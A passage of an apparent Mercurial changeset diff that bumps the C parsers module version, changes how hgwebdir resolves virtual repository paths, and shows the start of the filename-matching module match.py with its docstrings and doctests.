653 653 {"dict_new_presized", dict_new_presized, METH_VARARGS,
654 654 "construct a dict with an expected size\n"},
655 655 {"make_file_foldmap", make_file_foldmap, METH_VARARGS,
656 656 "make file foldmap\n"},
657 657 {"jsonescapeu8fast", jsonescapeu8fast, METH_VARARGS,
658 658 "escape a UTF-8 byte string to JSON (fast path)\n"},
659 659 {"encodedir", encodedir, METH_VARARGS, "encodedir a path\n"},
660 660 {"pathencode", pathencode, METH_VARARGS, "fncache-encode a path\n"},
661 661 {"lowerencode", lowerencode, METH_VARARGS, "lower-encode a path\n"},
662 662 {"fm1readmarkers", fm1readmarkers, METH_VARARGS,
663 663 "parse v1 obsolete markers\n"},
664 664 {NULL, NULL}};
665 665
666 666 void dirs_module_init(PyObject *mod);
667 667 void manifest_module_init(PyObject *mod);
668 668 void revlog_module_init(PyObject *mod);
669 669
670 static const int version = 12;
670 static const int version = 13;
671 671
672 672 static void module_init(PyObject *mod)
673 673 {
674 674 PyObject *capsule = NULL;
675 675 PyModule_AddIntConstant(mod, "version", version);
676 676
677 677 /* This module constant has two purposes. First, it lets us unit test
678 678 * the ImportError raised without hard-coding any error text. This
679 679 * means we can change the text in the future without breaking tests,
680 680 * even across changesets without a recompile. Second, its presence
681 681 * can be used to determine whether the version-checking logic is
682 682 * present, which also helps in testing across changesets without a
683 683 * recompile. Note that this means the pure-Python version of parsers
684 684 * should not have this module constant. */
685 685 PyModule_AddStringConstant(mod, "versionerrortext", versionerrortext);
686 686
687 687 dirs_module_init(mod);
688 688 manifest_module_init(mod);
689 689 revlog_module_init(mod);
690 690
691 691 capsule = PyCapsule_New(
692 692 make_dirstate_tuple,
693 693 "mercurial.cext.parsers.make_dirstate_tuple_CAPI", NULL);
694 694 if (capsule != NULL)
695 695 PyModule_AddObject(mod, "make_dirstate_tuple_CAPI", capsule);
696 696
697 697 if (PyType_Ready(&dirstateTupleType) < 0) {
698 698 return;
699 699 }
700 700 Py_INCREF(&dirstateTupleType);
701 701 PyModule_AddObject(mod, "dirstatetuple",
702 702 (PyObject *)&dirstateTupleType);
703 703 }
704 704
705 705 static int check_python_version(void)
706 706 {
707 707 PyObject *sys = PyImport_ImportModule("sys"), *ver;
708 708 long hexversion;
709 709 if (!sys) {
710 710 return -1;
711 711 }
712 712 ver = PyObject_GetAttrString(sys, "hexversion");
713 713 Py_DECREF(sys);
714 714 if (!ver) {
715 715 return -1;
716 716 }
717 717 hexversion = PyInt_AsLong(ver);
718 718 Py_DECREF(ver);
719 719 /* sys.hexversion is a 32-bit number by default, so the -1 case
720 720 * should only occur in unusual circumstances (e.g. if sys.hexversion
721 721 * is manually set to an invalid value). */
722 722 if ((hexversion == -1) || (hexversion >> 16 != PY_VERSION_HEX >> 16)) {
723 723 PyErr_Format(PyExc_ImportError,
724 724 "%s: The Mercurial extension "
725 725 "modules were compiled with Python " PY_VERSION
726 726 ", but "
727 727 "Mercurial is currently using Python with "
728 728 "sys.hexversion=%ld: "
729 729 "Python %s\n at: %s",
730 730 versionerrortext, hexversion, Py_GetVersion(),
731 731 Py_GetProgramFullPath());
732 732 return -1;
733 733 }
734 734 return 0;
735 735 }
736 736
737 737 #ifdef IS_PY3K
738 738 static struct PyModuleDef parsers_module = {PyModuleDef_HEAD_INIT, "parsers",
739 739 parsers_doc, -1, methods};
740 740
741 741 PyMODINIT_FUNC PyInit_parsers(void)
742 742 {
743 743 PyObject *mod;
744 744
745 745 if (check_python_version() == -1)
746 746 return NULL;
747 747 mod = PyModule_Create(&parsers_module);
748 748 module_init(mod);
749 749 return mod;
750 750 }
751 751 #else
752 752 PyMODINIT_FUNC initparsers(void)
753 753 {
754 754 PyObject *mod;
755 755
756 756 if (check_python_version() == -1) {
757 757 return;
758 758 }
759 759 mod = Py_InitModule3("parsers", methods, parsers_doc);
760 760 module_init(mod);
761 761 }
762 762 #endif
@@ -1,540 +1,536
1 1 # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories.
2 2 #
3 3 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
4 4 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import
10 10
11 11 import gc
12 12 import os
13 13 import time
14 14
15 15 from ..i18n import _
16 16
17 17 from .common import (
18 18 ErrorResponse,
19 19 HTTP_SERVER_ERROR,
20 20 cspvalues,
21 21 get_contact,
22 22 get_mtime,
23 23 ismember,
24 24 paritygen,
25 25 staticfile,
26 26 statusmessage,
27 27 )
28 28
29 29 from .. import (
30 30 configitems,
31 31 encoding,
32 32 error,
33 33 extensions,
34 34 hg,
35 35 profiling,
36 36 pycompat,
37 37 registrar,
38 38 scmutil,
39 39 templater,
40 40 templateutil,
41 41 ui as uimod,
42 42 util,
43 43 )
44 44
45 45 from . import (
46 46 hgweb_mod,
47 47 request as requestmod,
48 48 webutil,
49 49 wsgicgi,
50 50 )
51 51 from ..utils import dateutil
52 52
53 53 def cleannames(items):
54 54 return [(util.pconvert(name).strip('/'), path) for name, path in items]
55 55
56 56 def findrepos(paths):
57 57 repos = []
58 58 for prefix, root in cleannames(paths):
59 59 roothead, roottail = os.path.split(root)
60 60 # "foo = /bar/*" or "foo = /bar/**" lets every repo /bar/N in or below
61 61 # /bar/ be served as as foo/N .
62 62 # '*' will not search inside dirs with .hg (except .hg/patches),
63 63 # '**' will search inside dirs with .hg (and thus also find subrepos).
64 64 try:
65 65 recurse = {'*': False, '**': True}[roottail]
66 66 except KeyError:
67 67 repos.append((prefix, root))
68 68 continue
69 69 roothead = os.path.normpath(os.path.abspath(roothead))
70 70 paths = scmutil.walkrepos(roothead, followsym=True, recurse=recurse)
71 71 repos.extend(urlrepos(prefix, roothead, paths))
72 72 return repos
73 73
74 74 def urlrepos(prefix, roothead, paths):
75 75 """yield url paths and filesystem paths from a list of repo paths
76 76
77 77 >>> conv = lambda seq: [(v, util.pconvert(p)) for v,p in seq]
78 78 >>> conv(urlrepos(b'hg', b'/opt', [b'/opt/r', b'/opt/r/r', b'/opt']))
79 79 [('hg/r', '/opt/r'), ('hg/r/r', '/opt/r/r'), ('hg', '/opt')]
80 80 >>> conv(urlrepos(b'', b'/opt', [b'/opt/r', b'/opt/r/r', b'/opt']))
81 81 [('r', '/opt/r'), ('r/r', '/opt/r/r'), ('', '/opt')]
82 82 """
83 83 for path in paths:
84 84 path = os.path.normpath(path)
85 85 yield (prefix + '/' +
86 86 util.pconvert(path[len(roothead):]).lstrip('/')).strip('/'), path
87 87
88 88 def readallowed(ui, req):
89 89 """Check allow_read and deny_read config options of a repo's ui object
90 90 to determine user permissions. By default, with neither option set (or
91 91 both empty), allow all users to read the repo. There are two ways a
92 92 user can be denied read access: (1) deny_read is not empty, and the
93 93 user is unauthenticated or deny_read contains user (or *), and (2)
94 94 allow_read is not empty and the user is not in allow_read. Return True
95 95 if user is allowed to read the repo, else return False."""
96 96
97 97 user = req.remoteuser
98 98
99 99 deny_read = ui.configlist('web', 'deny_read', untrusted=True)
100 100 if deny_read and (not user or ismember(ui, user, deny_read)):
101 101 return False
102 102
103 103 allow_read = ui.configlist('web', 'allow_read', untrusted=True)
104 104 # by default, allow reading if no allow_read option has been set
105 105 if not allow_read or ismember(ui, user, allow_read):
106 106 return True
107 107
108 108 return False
109 109
110 110 def rawindexentries(ui, repos, req, subdir=''):
111 111 descend = ui.configbool('web', 'descend')
112 112 collapse = ui.configbool('web', 'collapse')
113 113 seenrepos = set()
114 114 seendirs = set()
115 115 for name, path in repos:
116 116
117 117 if not name.startswith(subdir):
118 118 continue
119 119 name = name[len(subdir):]
120 120 directory = False
121 121
122 122 if '/' in name:
123 123 if not descend:
124 124 continue
125 125
126 126 nameparts = name.split('/')
127 127 rootname = nameparts[0]
128 128
129 129 if not collapse:
130 130 pass
131 131 elif rootname in seendirs:
132 132 continue
133 133 elif rootname in seenrepos:
134 134 pass
135 135 else:
136 136 directory = True
137 137 name = rootname
138 138
139 139 # redefine the path to refer to the directory
140 140 discarded = '/'.join(nameparts[1:])
141 141
142 142 # remove name parts plus accompanying slash
143 143 path = path[:-len(discarded) - 1]
144 144
145 145 try:
146 146 hg.repository(ui, path)
147 147 directory = False
148 148 except (IOError, error.RepoError):
149 149 pass
150 150
151 151 parts = [
152 152 req.apppath.strip('/'),
153 153 subdir.strip('/'),
154 154 name.strip('/'),
155 155 ]
156 156 url = '/' + '/'.join(p for p in parts if p) + '/'
157 157
158 158 # show either a directory entry or a repository
159 159 if directory:
160 160 # get the directory's time information
161 161 try:
162 162 d = (get_mtime(path), dateutil.makedate()[1])
163 163 except OSError:
164 164 continue
165 165
166 166 # add '/' to the name to make it obvious that
167 167 # the entry is a directory, not a regular repository
168 168 row = {'contact': "",
169 169 'contact_sort': "",
170 170 'name': name + '/',
171 171 'name_sort': name,
172 172 'url': url,
173 173 'description': "",
174 174 'description_sort': "",
175 175 'lastchange': d,
176 176 'lastchange_sort': d[1] - d[0],
177 177 'archives': templateutil.mappinglist([]),
178 178 'isdirectory': True,
179 179 'labels': templateutil.hybridlist([], name='label'),
180 180 }
181 181
182 182 seendirs.add(name)
183 183 yield row
184 184 continue
185 185
186 186 u = ui.copy()
187 187 try:
188 188 u.readconfig(os.path.join(path, '.hg', 'hgrc'))
189 189 except Exception as e:
190 190 u.warn(_('error reading %s/.hg/hgrc: %s\n') % (path, e))
191 191 continue
192 192
193 193 def get(section, name, default=uimod._unset):
194 194 return u.config(section, name, default, untrusted=True)
195 195
196 196 if u.configbool("web", "hidden", untrusted=True):
197 197 continue
198 198
199 199 if not readallowed(u, req):
200 200 continue
201 201
202 202 # update time with local timezone
203 203 try:
204 204 r = hg.repository(ui, path)
205 205 except IOError:
206 206 u.warn(_('error accessing repository at %s\n') % path)
207 207 continue
208 208 except error.RepoError:
209 209 u.warn(_('error accessing repository at %s\n') % path)
210 210 continue
211 211 try:
212 212 d = (get_mtime(r.spath), dateutil.makedate()[1])
213 213 except OSError:
214 214 continue
215 215
216 216 contact = get_contact(get)
217 217 description = get("web", "description")
218 218 seenrepos.add(name)
219 219 name = get("web", "name", name)
220 220 labels = u.configlist('web', 'labels', untrusted=True)
221 221 row = {'contact': contact or "unknown",
222 222 'contact_sort': contact.upper() or "unknown",
223 223 'name': name,
224 224 'name_sort': name,
225 225 'url': url,
226 226 'description': description or "unknown",
227 227 'description_sort': description.upper() or "unknown",
228 228 'lastchange': d,
229 229 'lastchange_sort': d[1] - d[0],
230 230 'archives': webutil.archivelist(u, "tip", url),
231 231 'isdirectory': None,
232 232 'labels': templateutil.hybridlist(labels, name='label'),
233 233 }
234 234
235 235 yield row
236 236
237 237 def _indexentriesgen(context, ui, repos, req, stripecount, sortcolumn,
238 238 descending, subdir):
239 239 rows = rawindexentries(ui, repos, req, subdir=subdir)
240 240
241 241 sortdefault = None, False
242 242
243 243 if sortcolumn and sortdefault != (sortcolumn, descending):
244 244 sortkey = '%s_sort' % sortcolumn
245 245 rows = sorted(rows, key=lambda x: x[sortkey],
246 246 reverse=descending)
247 247
248 248 for row, parity in zip(rows, paritygen(stripecount)):
249 249 row['parity'] = parity
250 250 yield row
251 251
252 252 def indexentries(ui, repos, req, stripecount, sortcolumn='',
253 253 descending=False, subdir=''):
254 254 args = (ui, repos, req, stripecount, sortcolumn, descending, subdir)
255 255 return templateutil.mappinggenerator(_indexentriesgen, args=args)
256 256
257 257 class hgwebdir(object):
258 258 """HTTP server for multiple repositories.
259 259
260 260 Given a configuration, different repositories will be served depending
261 261 on the request path.
262 262
263 263 Instances are typically used as WSGI applications.
264 264 """
265 265 def __init__(self, conf, baseui=None):
266 266 self.conf = conf
267 267 self.baseui = baseui
268 268 self.ui = None
269 269 self.lastrefresh = 0
270 270 self.motd = None
271 271 self.refresh()
272 272 if not baseui:
273 273 # set up environment for new ui
274 274 extensions.loadall(self.ui)
275 275 extensions.populateui(self.ui)
276 276
277 277 def refresh(self):
278 278 if self.ui:
279 279 refreshinterval = self.ui.configint('web', 'refreshinterval')
280 280 else:
281 281 item = configitems.coreitems['web']['refreshinterval']
282 282 refreshinterval = item.default
283 283
284 284 # refreshinterval <= 0 means to always refresh.
285 285 if (refreshinterval > 0 and
286 286 self.lastrefresh + refreshinterval > time.time()):
287 287 return
288 288
289 289 if self.baseui:
290 290 u = self.baseui.copy()
291 291 else:
292 292 u = uimod.ui.load()
293 293 u.setconfig('ui', 'report_untrusted', 'off', 'hgwebdir')
294 294 u.setconfig('ui', 'nontty', 'true', 'hgwebdir')
295 295 # displaying bundling progress bar while serving feels wrong and may
296 296 # break some wsgi implementations.
297 297 u.setconfig('progress', 'disable', 'true', 'hgweb')
298 298
299 299 if not isinstance(self.conf, (dict, list, tuple)):
300 300 map = {'paths': 'hgweb-paths'}
301 301 if not os.path.exists(self.conf):
302 302 raise error.Abort(_('config file %s not found!') % self.conf)
303 303 u.readconfig(self.conf, remap=map, trust=True)
304 304 paths = []
305 305 for name, ignored in u.configitems('hgweb-paths'):
306 306 for path in u.configlist('hgweb-paths', name):
307 307 paths.append((name, path))
308 308 elif isinstance(self.conf, (list, tuple)):
309 309 paths = self.conf
310 310 elif isinstance(self.conf, dict):
311 311 paths = self.conf.items()
312 312 extensions.populateui(u)
313 313
314 314 repos = findrepos(paths)
315 315 for prefix, root in u.configitems('collections'):
316 316 prefix = util.pconvert(prefix)
317 317 for path in scmutil.walkrepos(root, followsym=True):
318 318 repo = os.path.normpath(path)
319 319 name = util.pconvert(repo)
320 320 if name.startswith(prefix):
321 321 name = name[len(prefix):]
322 322 repos.append((name.lstrip('/'), repo))
323 323
324 324 self.repos = repos
325 325 self.ui = u
326 326 encoding.encoding = self.ui.config('web', 'encoding')
327 327 self.style = self.ui.config('web', 'style')
328 328 self.templatepath = self.ui.config('web', 'templates', untrusted=False)
329 329 self.stripecount = self.ui.config('web', 'stripes')
330 330 if self.stripecount:
331 331 self.stripecount = int(self.stripecount)
332 332 prefix = self.ui.config('web', 'prefix')
333 333 if prefix.startswith('/'):
334 334 prefix = prefix[1:]
335 335 if prefix.endswith('/'):
336 336 prefix = prefix[:-1]
337 337 self.prefix = prefix
338 338 self.lastrefresh = time.time()
339 339
340 340 def run(self):
341 341 if not encoding.environ.get('GATEWAY_INTERFACE',
342 342 '').startswith("CGI/1."):
343 343 raise RuntimeError("This function is only intended to be "
344 344 "called while running as a CGI script.")
345 345 wsgicgi.launch(self)
346 346
347 347 def __call__(self, env, respond):
348 348 baseurl = self.ui.config('web', 'baseurl')
349 349 req = requestmod.parserequestfromenv(env, altbaseurl=baseurl)
350 350 res = requestmod.wsgiresponse(req, respond)
351 351
352 352 return self.run_wsgi(req, res)
353 353
354 354 def run_wsgi(self, req, res):
355 355 profile = self.ui.configbool('profiling', 'enabled')
356 356 with profiling.profile(self.ui, enabled=profile):
357 357 try:
358 358 for r in self._runwsgi(req, res):
359 359 yield r
360 360 finally:
361 361 # There are known cycles in localrepository that prevent
362 362 # those objects (and tons of held references) from being
363 363 # collected through normal refcounting. We mitigate those
364 364 # leaks by performing an explicit GC on every request.
365 365 # TODO remove this once leaks are fixed.
366 366 # TODO only run this on requests that create localrepository
367 367 # instances instead of every request.
368 368 gc.collect()
369 369
370 370 def _runwsgi(self, req, res):
371 371 try:
372 372 self.refresh()
373 373
374 374 csp, nonce = cspvalues(self.ui)
375 375 if csp:
376 376 res.headers['Content-Security-Policy'] = csp
377 377
378 378 virtual = req.dispatchpath.strip('/')
379 379 tmpl = self.templater(req, nonce)
380 380 ctype = tmpl.render('mimetype', {'encoding': encoding.encoding})
381 381
382 382 # Global defaults. These can be overridden by any handler.
383 383 res.status = '200 Script output follows'
384 384 res.headers['Content-Type'] = ctype
385 385
386 386 # a static file
387 387 if virtual.startswith('static/') or 'static' in req.qsparams:
388 388 if virtual.startswith('static/'):
389 389 fname = virtual[7:]
390 390 else:
391 391 fname = req.qsparams['static']
392 392 static = self.ui.config("web", "static", untrusted=False)
393 393 if not static:
394 394 tp = self.templatepath or templater.templatepaths()
395 395 if isinstance(tp, str):
396 396 tp = [tp]
397 397 static = [os.path.join(p, 'static') for p in tp]
398 398
399 399 staticfile(static, fname, res)
400 400 return res.sendresponse()
401 401
402 402 # top-level index
403 403
404 404 repos = dict(self.repos)
405 405
406 406 if (not virtual or virtual == 'index') and virtual not in repos:
407 407 return self.makeindex(req, res, tmpl)
408 408
409 409 # nested indexes and hgwebs
410 410
411 411 if virtual.endswith('/index') and virtual not in repos:
412 412 subdir = virtual[:-len('index')]
413 413 if any(r.startswith(subdir) for r in repos):
414 414 return self.makeindex(req, res, tmpl, subdir)
415 415
416 416 def _virtualdirs():
417 # Check the full virtual path, each parent, and the root ('')
418 if virtual != '':
419 yield virtual
420
421 for p in util.finddirs(virtual):
422 yield p
423
424 yield ''
417 # Check the full virtual path, and each parent
418 yield virtual
419 for p in util.finddirs(virtual):
420 yield p
425 421
426 422 for virtualrepo in _virtualdirs():
427 423 real = repos.get(virtualrepo)
428 424 if real:
429 425 # Re-parse the WSGI environment to take into account our
430 426 # repository path component.
431 427 uenv = req.rawenv
432 428 if pycompat.ispy3:
433 429 uenv = {k.decode('latin1'): v for k, v in
434 430 uenv.iteritems()}
435 431 req = requestmod.parserequestfromenv(
436 432 uenv, reponame=virtualrepo,
437 433 altbaseurl=self.ui.config('web', 'baseurl'),
438 434 # Reuse wrapped body file object otherwise state
439 435 # tracking can get confused.
440 436 bodyfh=req.bodyfh)
441 437 try:
442 438 # ensure caller gets private copy of ui
443 439 repo = hg.repository(self.ui.copy(), real)
444 440 return hgweb_mod.hgweb(repo).run_wsgi(req, res)
445 441 except IOError as inst:
446 442 msg = encoding.strtolocal(inst.strerror)
447 443 raise ErrorResponse(HTTP_SERVER_ERROR, msg)
448 444 except error.RepoError as inst:
449 445 raise ErrorResponse(HTTP_SERVER_ERROR, bytes(inst))
450 446
451 447 # browse subdirectories
452 448 subdir = virtual + '/'
453 449 if [r for r in repos if r.startswith(subdir)]:
454 450 return self.makeindex(req, res, tmpl, subdir)
455 451
456 452 # prefixes not found
457 453 res.status = '404 Not Found'
458 454 res.setbodygen(tmpl.generate('notfound', {'repo': virtual}))
459 455 return res.sendresponse()
460 456
461 457 except ErrorResponse as e:
462 458 res.status = statusmessage(e.code, pycompat.bytestr(e))
463 459 res.setbodygen(tmpl.generate('error', {'error': e.message or ''}))
464 460 return res.sendresponse()
465 461 finally:
466 462 tmpl = None
467 463
468 464 def makeindex(self, req, res, tmpl, subdir=""):
469 465 self.refresh()
470 466 sortable = ["name", "description", "contact", "lastchange"]
471 467 sortcolumn, descending = None, False
472 468 if 'sort' in req.qsparams:
473 469 sortcolumn = req.qsparams['sort']
474 470 descending = sortcolumn.startswith('-')
475 471 if descending:
476 472 sortcolumn = sortcolumn[1:]
477 473 if sortcolumn not in sortable:
478 474 sortcolumn = ""
479 475
480 476 sort = [("sort_%s" % column,
481 477 "%s%s" % ((not descending and column == sortcolumn)
482 478 and "-" or "", column))
483 479 for column in sortable]
484 480
485 481 self.refresh()
486 482
487 483 entries = indexentries(self.ui, self.repos, req,
488 484 self.stripecount, sortcolumn=sortcolumn,
489 485 descending=descending, subdir=subdir)
490 486
491 487 mapping = {
492 488 'entries': entries,
493 489 'subdir': subdir,
494 490 'pathdef': hgweb_mod.makebreadcrumb('/' + subdir, self.prefix),
495 491 'sortcolumn': sortcolumn,
496 492 'descending': descending,
497 493 }
498 494 mapping.update(sort)
499 495 res.setbodygen(tmpl.generate('index', mapping))
500 496 return res.sendresponse()
501 497
502 498 def templater(self, req, nonce):
503 499
504 500 def config(section, name, default=uimod._unset, untrusted=True):
505 501 return self.ui.config(section, name, default, untrusted)
506 502
507 503 vars = {}
508 504 styles, (style, mapfile) = hgweb_mod.getstyle(req, config,
509 505 self.templatepath)
510 506 if style == styles[0]:
511 507 vars['style'] = style
512 508
513 509 sessionvars = webutil.sessionvars(vars, '?')
514 510 logourl = config('web', 'logourl')
515 511 logoimg = config('web', 'logoimg')
516 512 staticurl = (config('web', 'staticurl')
517 513 or req.apppath.rstrip('/') + '/static/')
518 514 if not staticurl.endswith('/'):
519 515 staticurl += '/'
520 516
521 517 defaults = {
522 518 "encoding": encoding.encoding,
523 519 "url": req.apppath + '/',
524 520 "logourl": logourl,
525 521 "logoimg": logoimg,
526 522 "staticurl": staticurl,
527 523 "sessionvars": sessionvars,
528 524 "style": style,
529 525 "nonce": nonce,
530 526 }
531 527 templatekeyword = registrar.templatekeyword(defaults)
532 528 @templatekeyword('motd', requires=())
533 529 def motd(context, mapping):
534 530 if self.motd is not None:
535 531 yield self.motd
536 532 else:
537 533 yield config('web', 'motd')
538 534
539 535 tmpl = templater.templater.frommapfile(mapfile, defaults=defaults)
540 536 return tmpl
@@ -1,1530 +1,1526
1 1 # match.py - filename matching
2 2 #
3 3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import, print_function
9 9
10 10 import copy
11 11 import itertools
12 12 import os
13 13 import re
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pathutil,
20 20 pycompat,
21 21 util,
22 22 )
23 23 from .utils import (
24 24 stringutil,
25 25 )
26 26
27 27 try:
28 28 from . import rustext
29 29 rustext.__name__ # force actual import (see hgdemandimport)
30 30 except ImportError:
31 31 rustext = None
32 32
33 33 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
34 34 'rootglob',
35 35 'listfile', 'listfile0', 'set', 'include', 'subinclude',
36 36 'rootfilesin')
37 37 cwdrelativepatternkinds = ('relpath', 'glob')
38 38
39 39 propertycache = util.propertycache
40 40
41 41 def _rematcher(regex):
42 42 '''compile the regexp with the best available regexp engine and return a
43 43 matcher function'''
44 44 m = util.re.compile(regex)
45 45 try:
46 46 # slightly faster, provided by facebook's re2 bindings
47 47 return m.test_match
48 48 except AttributeError:
49 49 return m.match
50 50
51 51 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
52 52 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
53 53 matchers = []
54 54 other = []
55 55
56 56 for kind, pat, source in kindpats:
57 57 if kind == 'set':
58 58 if ctx is None:
59 59 raise error.ProgrammingError("fileset expression with no "
60 60 "context")
61 61 matchers.append(ctx.matchfileset(pat, badfn=badfn))
62 62
63 63 if listsubrepos:
64 64 for subpath in ctx.substate:
65 65 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
66 66 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
67 67 matchers.append(pm)
68 68
69 69 continue
70 70 other.append((kind, pat, source))
71 71 return matchers, other
72 72
73 73 def _expandsubinclude(kindpats, root):
74 74 '''Returns the list of subinclude matcher args and the kindpats without the
75 75 subincludes in it.'''
76 76 relmatchers = []
77 77 other = []
78 78
79 79 for kind, pat, source in kindpats:
80 80 if kind == 'subinclude':
81 81 sourceroot = pathutil.dirname(util.normpath(source))
82 82 pat = util.pconvert(pat)
83 83 path = pathutil.join(sourceroot, pat)
84 84
85 85 newroot = pathutil.dirname(path)
86 86 matcherargs = (newroot, '', [], ['include:%s' % path])
87 87
88 88 prefix = pathutil.canonpath(root, root, newroot)
89 89 if prefix:
90 90 prefix += '/'
91 91 relmatchers.append((prefix, matcherargs))
92 92 else:
93 93 other.append((kind, pat, source))
94 94
95 95 return relmatchers, other
96 96
97 97 def _kindpatsalwaysmatch(kindpats):
98 98 """"Checks whether the kindspats match everything, as e.g.
99 99 'relpath:.' does.
100 100 """
101 101 for kind, pat, source in kindpats:
102 102 if pat != '' or kind not in ['relpath', 'glob']:
103 103 return False
104 104 return True
105 105
106 106 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
107 107 listsubrepos=False, badfn=None):
108 108 matchers = []
109 109 fms, kindpats = _expandsets(kindpats, ctx=ctx,
110 110 listsubrepos=listsubrepos, badfn=badfn)
111 111 if kindpats:
112 112 m = matchercls(root, kindpats, badfn=badfn)
113 113 matchers.append(m)
114 114 if fms:
115 115 matchers.extend(fms)
116 116 if not matchers:
117 117 return nevermatcher(badfn=badfn)
118 118 if len(matchers) == 1:
119 119 return matchers[0]
120 120 return unionmatcher(matchers)
121 121
122 122 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
123 123 auditor=None, ctx=None, listsubrepos=False, warn=None,
124 124 badfn=None, icasefs=False):
125 125 r"""build an object to match a set of file patterns
126 126
127 127 arguments:
128 128 root - the canonical root of the tree you're matching against
129 129 cwd - the current working directory, if relevant
130 130 patterns - patterns to find
131 131 include - patterns to include (unless they are excluded)
132 132 exclude - patterns to exclude (even if they are included)
133 133 default - if a pattern in patterns has no explicit type, assume this one
134 134 auditor - optional path auditor
135 135 ctx - optional changecontext
136 136 listsubrepos - if True, recurse into subrepositories
137 137 warn - optional function used for printing warnings
138 138 badfn - optional bad() callback for this matcher instead of the default
139 139 icasefs - make a matcher for wdir on case insensitive filesystems, which
140 140 normalizes the given patterns to the case in the filesystem
141 141
142 142 a pattern is one of:
143 143 'glob:<glob>' - a glob relative to cwd
144 144 're:<regexp>' - a regular expression
145 145 'path:<path>' - a path relative to repository root, which is matched
146 146 recursively
147 147 'rootfilesin:<path>' - a path relative to repository root, which is
148 148 matched non-recursively (will not match subdirectories)
149 149 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
150 150 'relpath:<path>' - a path relative to cwd
151 151 'relre:<regexp>' - a regexp that needn't match the start of a name
152 152 'set:<fileset>' - a fileset expression
153 153 'include:<path>' - a file of patterns to read and include
154 154 'subinclude:<path>' - a file of patterns to match against files under
155 155 the same directory
156 156 '<something>' - a pattern of the specified default type
157 157
158 158 Usually a patternmatcher is returned:
159 159 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
160 160 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
161 161
162 162 Combining 'patterns' with 'include' (resp. 'exclude') gives an
163 163 intersectionmatcher (resp. a differencematcher):
164 164 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
165 165 <class 'mercurial.match.intersectionmatcher'>
166 166 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
167 167 <class 'mercurial.match.differencematcher'>
168 168
169 169 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
170 170 >>> match(b'foo', b'.', [])
171 171 <alwaysmatcher>
172 172
173 173 The 'default' argument determines which kind of pattern is assumed if a
174 174 pattern has no prefix:
175 175 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
176 176 <patternmatcher patterns='.*\\.c$'>
177 177 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
178 178 <patternmatcher patterns='main\\.py(?:/|$)'>
179 179 >>> match(b'foo', b'.', [b'main.py'], default=b're')
180 180 <patternmatcher patterns='main.py'>
181 181
182 182 The primary use of matchers is to check whether a value (usually a file
183 183 name) matches againset one of the patterns given at initialization. There
184 184 are two ways of doing this check.
185 185
186 186 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
187 187
188 188 1. Calling the matcher with a file name returns True if any pattern
189 189 matches that file name:
190 190 >>> m(b'a')
191 191 True
192 192 >>> m(b'main.c')
193 193 True
194 194 >>> m(b'test.py')
195 195 False
196 196
197 197 2. Using the exact() method only returns True if the file name matches one
198 198 of the exact patterns (i.e. not re: or glob: patterns):
199 199 >>> m.exact(b'a')
200 200 True
201 201 >>> m.exact(b'main.c')
202 202 False
203 203 """
204 204 normalize = _donormalize
205 205 if icasefs:
206 206 dirstate = ctx.repo().dirstate
207 207 dsnormalize = dirstate.normalize
208 208
209 209 def normalize(patterns, default, root, cwd, auditor, warn):
210 210 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
211 211 kindpats = []
212 212 for kind, pats, source in kp:
213 213 if kind not in ('re', 'relre'): # regex can't be normalized
214 214 p = pats
215 215 pats = dsnormalize(pats)
216 216
217 217 # Preserve the original to handle a case only rename.
218 218 if p != pats and p in dirstate:
219 219 kindpats.append((kind, p, source))
220 220
221 221 kindpats.append((kind, pats, source))
222 222 return kindpats
223 223
224 224 if patterns:
225 225 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
226 226 if _kindpatsalwaysmatch(kindpats):
227 227 m = alwaysmatcher(badfn)
228 228 else:
229 229 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
230 230 listsubrepos=listsubrepos, badfn=badfn)
231 231 else:
232 232 # It's a little strange that no patterns means to match everything.
233 233 # Consider changing this to match nothing (probably using nevermatcher).
234 234 m = alwaysmatcher(badfn)
235 235
236 236 if include:
237 237 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
238 238 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
239 239 listsubrepos=listsubrepos, badfn=None)
240 240 m = intersectmatchers(m, im)
241 241 if exclude:
242 242 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
243 243 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
244 244 listsubrepos=listsubrepos, badfn=None)
245 245 m = differencematcher(m, em)
246 246 return m
247 247
248 248 def exact(files, badfn=None):
249 249 return exactmatcher(files, badfn=badfn)
250 250
251 251 def always(badfn=None):
252 252 return alwaysmatcher(badfn)
253 253
254 254 def never(badfn=None):
255 255 return nevermatcher(badfn)
256 256
257 257 def badmatch(match, badfn):
258 258 """Make a copy of the given matcher, replacing its bad method with the given
259 259 one.
260 260 """
261 261 m = copy.copy(match)
262 262 m.bad = badfn
263 263 return m
264 264
